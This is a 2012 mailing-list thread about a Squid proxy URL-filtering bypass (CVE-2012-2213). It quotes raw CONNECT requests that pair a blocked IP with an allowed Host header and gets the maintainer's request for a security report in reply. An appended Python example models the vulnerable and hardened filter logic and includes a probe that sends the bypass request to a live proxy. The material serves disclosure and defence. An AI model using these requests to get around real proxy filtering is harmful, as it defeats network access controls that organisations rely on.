Re: Squid URL Filtering Bypass

From: Amos Jeffries (amostreenet.co.nz)
Date: Fri Apr 20 2012 - 17:52:18 CDT


On 17/04/2012 10:11 a.m., Gabriel Menezes Nunes wrote:
> # Exploit Title: Squid URL Filtering Bypass
> # Date: 16/04/2012
> # Author: Gabriel Menezes Nunes
> # Version: Squid Proxy
> # Tested on: Squid Proxy 3.1.19
> # CVE: CVE-2012-2213
>
>
> I found a vulnerability in Squid Proxy that allows access to filtered sites.
> The software trusts the Host field of the HTTP header when the CONNECT method is used.
> Example
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.facebook.com
>
>
> It is blocked.
>
> CONNECT 66.220.147.44:443 HTTP/1.1 (without host field)
>
> It is blocked.
>
> But:
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.uol.com.br (allowed url)
>
> The connection works.
>
> From here, I can send SSL traffic without a problem. This way, I can
> access any blocked site that allows SSL connections.
>
>
> This vulnerability is different from the CONNECT Tunnel method. The
> flaw is in the Host field processing. The software trusts this
> field.
>
> So any site can be accessed. URL filtering in this software is
> irrelevant and useless.
> One of the most important (if not the most important) features of this
> kind of device is to protect the network from accessing specific URLs.
> So this flaw is very dangerous, and it can even be implemented in
> malware, bypassing any protection.
> I developed a Python script that acts as a proxy and uses this
> flaw to access any site.
> This tool is just a proof of concept.

Can you please email these details and the squid.conf used to find it to
the security bugs reporting address bugs at squid-cache.org.

This appears to be an aspect of same-origin bypass (CVE-2009-0801) or
something closely related.

Thank You
Amos Jeffries
Squid Software Foundation
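The three CONNECT requests Gabriel lists above (target IP with a blocked Host, no Host, and an allowed Host) are the whole finding, so the following is an added example, written by the editor and not taken from the post or from the Squid code base. It models a filter that keys its decision on the Host header, which reproduces the three verdicts from the post, next to a filter that keys on the request-line authority (the only thing a CONNECT tunnel can actually reach) and rejects a Host header that disagrees with it. It also includes a probe that sends the same raw request to a live proxy so the behaviour can be checked against a real squid.conf. The deny/allow lists, the domain-to-IP mapping and the proxy address are constructed for illustration.

```python
import socket
from typing import Optional

# Constructed policy: one blocked domain with the IP it resolves to in the
# post, and one explicitly allowed domain. Real deployments would populate
# these from their ACLs; the values here exist only to reproduce the post.
DENY_DOMAINS = {"www.facebook.com"}
DENY_IPS = {"66.220.147.44"}
ALLOW_DOMAINS = {"www.uol.com.br"}


def build_connect(target: str, host_header: Optional[str] = None) -> bytes:
    """Build the raw CONNECT request in the shape shown in the post."""
    req = f"CONNECT {target} HTTP/1.1\r\n"
    if host_header is not None:
        req += f"Host: {host_header}\r\n"
    return (req + "\r\n").encode("ascii")


def parse_request(raw: bytes):
    """Return (method, request-target, headers) from a raw HTTP request head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def _hostname(authority: str) -> str:
    """Strip an optional :port and lower-case a host:port authority."""
    return authority.split(":", 1)[0].lower()


def _is_denied(name: str) -> bool:
    """True when a hostname or IP literal is on the constructed deny list."""
    name = _hostname(name)
    return name in DENY_DOMAINS or name in DENY_IPS


def filter_trusting_host(raw: bytes) -> str:
    """Vulnerable model: if a Host header is present it replaces the
    request-line target as the name being filtered, so the IP the tunnel
    is really opened to is never examined once a harmless Host is sent."""
    _method, target, headers = parse_request(raw)
    subject = headers.get("host", target)
    return "deny" if _is_denied(subject) else "allow"


def filter_on_target(raw: bytes) -> str:
    """Hardened model: for CONNECT, filter the authority in the request
    line, and treat a Host header that disagrees with it as an error."""
    method, target, headers = parse_request(raw)
    if method != "CONNECT":
        return "allow"  # non-tunnel requests are out of scope for this model
    host = headers.get("host")
    if host is not None and _hostname(host) != _hostname(target):
        return "deny"  # Host/target mismatch: the request is lying about itself
    return "deny" if _is_denied(target) else "allow"


def probe(proxy_host: str, proxy_port: int, target: str,
          host_header: Optional[str] = None, timeout: float = 5.0) -> Optional[int]:
    """Send one CONNECT to a live proxy and return the HTTP status it answers
    with (200 means the tunnel was opened). Uses the network; not run offline."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(build_connect(target, host_header))
        status_line = s.recv(4096).split(b"\r\n", 1)[0]
    try:
        return int(status_line.split()[1])
    except (IndexError, ValueError):
        return None


if __name__ == "__main__":
    # The three cases from the post, run through both filter models offline.
    cases = [
        ("66.220.147.44:443", "www.facebook.com"),  # blocked Host
        ("66.220.147.44:443", None),                 # no Host
        ("66.220.147.44:443", "www.uol.com.br"),     # allowed Host: the bypass
    ]
    for target, host in cases:
        raw = build_connect(target, host)
        print(f"Host={host!r:20} trusting-host={filter_trusting_host(raw):5} "
              f"on-target={filter_on_target(raw)}")
    # To test a real proxy (assumed address; adjust to your own):
    # print(probe("127.0.0.1", 3128, "66.220.147.44:443", "www.uol.com.br"))
```

The two models differ only in which name they feed to the deny list. Whatever the exact code path in Squid 3.1.19 turns out to be, the check a proxy operator wants is the one in `filter_on_target`: the CONNECT request line names the endpoint the tunnel will be opened to, so that is what ACLs must be evaluated against, and a Host header that names something else should be rejected rather than believed.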